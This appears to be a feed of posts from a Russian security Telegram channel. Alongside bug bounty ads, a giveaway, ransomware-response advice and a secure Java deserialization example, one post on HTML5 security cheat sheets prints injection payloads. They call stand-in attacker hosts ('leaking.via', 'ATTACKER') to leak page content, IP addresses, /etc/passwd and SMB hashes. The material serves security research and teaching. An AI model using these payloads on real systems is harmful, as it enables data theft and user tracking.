Похек

раздача приваток бб на спавне

✨ Хочешь получить доступ к приватным программам на платформе Standoff Bug Bounty? Конечно хочешь. Вот короткая инструкция, что делать: 1️⃣ Перейди по ссылке и заполни небольшой опрос. 2️⃣ Попади в список из 50 счастливчиков с самыми классными навыками и опытом. Если пройдешь отбор, мы сразу же тебе напишем. 3️⃣ Ищи баги в свеженьком закрытом скоупе. ❗️ Важное условие: у тебя не должно быть ни одной приватной программы. Еще читаешь? Бросай это дело — анкета сама себя не заполнит.

🌐🌐 Без воды, только практика. Без цензуры, только правда. Всё, что вы хотели узнать из первых уст. Мы запускаем серию подкастов Рынок уязвимостей: как устроен рынок багбаунти в России | Эпизод 1 В первом эпизоде подкаста узнаем, чем сегодня живет «мир багбаунти» в России и исследуем, как эти программы трансформируют рынок кибербезопасности. Обсудим, как компании используют багбаунти для повышения безопасности, какие ведущие платформы и инициативы существуют в России. В гостях у Луки Сафонова (основатель bugbounty.ru) Андрей Левкин (Руководитель продукта BI.ZONE Bug Bounty) и Анатолий Иванов (Руководитель платформы Standoff Bug Bounty) Выбирайте, где смотреть 📺 YouTube 📱 VK 🔔RUTUBE Полезные ссылки: Standoff 360 Positive Technologies BI.ZONE BI.ZONE Bug Bounty BugBountyRu Киберполигон

⚙️ #заметки #offense #web ➡️Cheat sheet по безопасности HTML5; (*от создателей DOMPurify)    🧩 cure53/H5SC 💻 🧩 html5sec.org ▪️ [ html5sec.org/test/#<1...149> ] Для каждого из почти 150 приведённых векторов XSS атак существует демо-стенд, где можно отредактировать полезную нагрузку➕понаблюдать за её поведением внутри iframe'ов с различными DTD (HTML5, HTML4, XHTML); ▪️ [ html5sec.org/test.<ext> ] Примеры файлов, содержащих полезную нагрузку для вызова alert(1), со следующими расширениями:

asf, avi, class, css, dtd, eml, evt, gif, hlp, hta, htc, html, jar, js, json, mpeg, pdf, sct, svg, swf, vbs, vml, wbxml, xbl, xdr, xml, xsl, xxe, zip

▪️vectors.txt➖ Словарь с примерами пейлоадов для каждого вектора XSS атаки; ➡️Список примеров HTML элементов, которые могут инициировать запросы к ресурсам; (*тоже от создателей DOMPurify) Может быть полезен как памятка для составления полезной нагрузки для эксплуатации возможности внедрения HTML кода: для реализации OOB запросов и эксфильтрации данных; Или как чеклист для проверки, как там поживает Ваша анонимность, ведь именно по такому принципу работают, например, пиксели-трекеры в электронных письмах🐇    🧩 cure53/HTTPLeaks ▪️ vectors.txt➖ Список с примерами пейлоадов; Вот, например, несколько включений из него:

...
<img dynsrc="https://leaking.via/img-dynsrc">
<img lowsrc="https://leaking.via/img-lowsrc">
<video controls><source src="https://leaking.via/video-source-src" type="video/mp4"></video>
<style>@import url(https://leaking.via/css-import-url);</style>
<svg version="1.1" xmlns="http://www.w3.org/2000/svg"><rect cursor="url(https://leaking.via/svg-cursor),auto" /></svg>
<xml src="https://leaking.via/xml-src" id="xml"></xml>
<math xlink:href="https://leaking.via/mathml-math">CLICKME</math>
...

▪️ Несколько примеров из реальной жизни:

➖[Chrome]  Leak user html content using Dangling Markup injection when http upgrade to https ▪️ЧТО:       <img src="http://ATTACKER/?q= ▪️КОГДА:   HTTP➡️HTTPS для http://ATTACKER ▪️ИТОГ:      утечка содержимого страницы ➖[Proton]  User IP address leaked on email open ▪️ЧТО:       <svg><style>circle { background-image: url(https://ATTACKER/200); }</style><circle></circle></svg> ▪️КОГДА:  при открытии письма ▪️ИТОГ:      утечка IP адреса ➖[macOS]  This man thought opening a txt file is fine, he thought wrong ▪️ЧТО: ℹ️ <!DOCTYPE HTML><html><head></head><body><style>@import{ "file:///net/ATTACKER/a.css"}</style></body></html> ℹ️ <iframedoc src="file:///etc/passwd"> ▪️КОГДА:  при открытии TXT файла в TextEdit ▪️ИТОГ:      DoS (например, подтянуть /dev/zero), утечка IP адреса + содержимого локальных файлов (*объединить пейлоады) ➖[MS Outlook]  SMB hash hijacking & user tracking ▪️ЧТО: <v:background xmlns_v="urn:schemas-microsoft-com:vml"><br><v:fill src="<strong>its:/ATTACKER/IDontExistNew/foobar</strong>"></v:fill><br></v:background> ▪️КОГДА:  при открытии письма ▪️ИТОГ:  внешние SMB / WebDAV запросы

@HaHacking 🐇

🔵 Инженер техподдержки? Получи оффер в YADRO всего за неделю! У тебя есть возможность поучаствовать в One Week Offer от крупнейшей технологической компании России - лидера инженерной индустрии. Если ты хорошо знаешь принципы серверной архитектуры и СХД и хочешь стать частью масштабных проектов: • Пришли своё резюме и заполни форму участия до 22 сентября. • Пройди техническое интервью. • Получи оффер после успешного собеседования. Скорее переходи по ссылке, оставляй заявку и стань частью команды.

🎉 Результаты розыгрыша: Победители: 1. ooYa9ii (@Russian_OSlNT) 2. ALISHER (@megaumka) 3. Константин (@kr1pt0graf) 4. Babidshon (@BABIDSHON12) 5. Даниил (@by_dnk) 6. Алексей 7. Алексей (@lost_fany) 8. .Morty (@moortyyy) 9. Panteleevich (@Cracka1) 10. Anton (@TichoBrage) Проверить результаты

❗️ Как реагировать на атаки шифровальщиков: рекомендации для CISO ❗️ #ciso Атаки вирусов-шифровальщиков остаются серьезной угрозой информационной безопасности компаний. От них не застрахованы даже корпорации с многоуровневыми системами защиты, целыми армиями ИБ-специалистов и арсеналами СЗИ. Если корпоративная сеть подверглась такой атаке, ИБ-службе и CISO лучше поскорее подключить команду реагирования. Однако бизнес и штатные сотрудники службы безопасности могут самостоятельно снизить риск атак программ-вымогателей, дополнительно защитить критичные файлы и облегчить расследование, если избежать инцидента все же не удалось. Как именно? Рассказывает Семен Рогачев, руководитель отдела реагирования на инциденты Бастиона. ➡️ Читать далее 🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек

OAuth от и до. Ищем цепочки уязвимостей при атаках на авторизацию #статьи #подписчикам Сегодня разберем мисконфиги OAuth, которые встречаются в дикой природе и хоть сами по себе безобидны, в определенных условиях могут иметь серьезные последствия — вплоть до похека админских аккаунтов. В этой сатье я покажу, как искать такие цепочки уязвимостей. https://xakep.ru/2024/09/13/oauth-vuln-chains/

Innostage, интегратор и разработчик сервисов и решений в области цифровой безопасности, объявил о повышении вознаграждения в программе открытых кибериспытаний до 10 миллионов рублей! Вознаграждение получит исследователь, которому удастся реализовать недопустимое событие — перевести со счетов компании 2000 рублей. Также в программе есть промежуточные события: ➡️ компрометация корпоративной учетной записи с закреплением на корпоративной рабочей станции. ➡️ преодоление сетевого периметра и закрепление на узле в инфраструктуре. ➡️ получение доступа в систему учета финансов и создания платежных поручений под релевантной для недопустимого события или привилегированной учетной записью. За них можно получить от 100 тысяч до 1 миллиона рублей. Пока что вознаграждение смог получить только один исследователь — за компрометацию учетной записи с помощью фишинга. Innostage — первый интегратор, который вышел на открытые кибериспытания. Программа на платформе для исследователей безопасности Standoff Bug Bounty привлекла уже больше 630 участников, в том числе известных команды красных, постоянных участников Standoff: DreamTeam, Wetox и True0xA3. Реклама. ООО «Телеком Интеграция». ИНН: 7731642944

🖥 Basic Java Deserialization (2 part) Теперь поговорим о том, как защищаться от десериализации Пример безопасного кода:

import java.io.*;
import java.net.ServerSocket;
import java.net.Socket;
import java.util.HashSet;
import java.util.Set;

public class SecureServer {
    private static final Set<String> ALLOWED_CLASSES = new HashSet<>();
    static {
        ALLOWED_CLASSES.add("java.lang.String");
        ALLOWED_CLASSES.add("java.util.ArrayList");
    }

    public static void main(String[] args) {
        try (ServerSocket serverSocket = new ServerSocket(1234)) {
            System.out.println("Сервер запущен. Ожидание подключений...");
            while (true) {
                try (Socket clientSocket = serverSocket.accept();
                     ObjectInputStream ois = new ObjectInputStream(clientSocket.getInputStream()) {
                         @Override
                         protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
                             if (!ALLOWED_CLASSES.contains(desc.getName())) {
                                 throw new InvalidClassException("Недопустимый класс", desc.getName());
                             }
                             return super.resolveClass(desc);
                         }
                     }) {
                    
                    Object obj = ois.readObject();
                    System.out.println("Получен объект: " + obj);
                    
                } catch (Exception e) {
                    e.printStackTrace();
                }
            }
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

Исправления: ➡️Создан белый список разрешенных классов (ALLOWED_CLASSES). ➡️Переопределен метод resolveClass для проверки классов перед десериализацией. ➡️Выбрасывается исключение при попытке десериализовать недопустимый класс. Также есть другие практики по защите от десеров. К примеру Java SecurityManager, transient. С другой стороны вы можете закостылить защиту через сторонние библиотеки: SerialKiller, fastjson2, YamlBeans ➡️ В завершение хочу сказать, что если вы нашли у меня ошибку, напишите об этом, пожалуйста в комментариях) ➡️ А если вам понравилось и вы хотите продолжить изучение, то предлагаю почитать Java Deserialization Cheat Sheet 🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек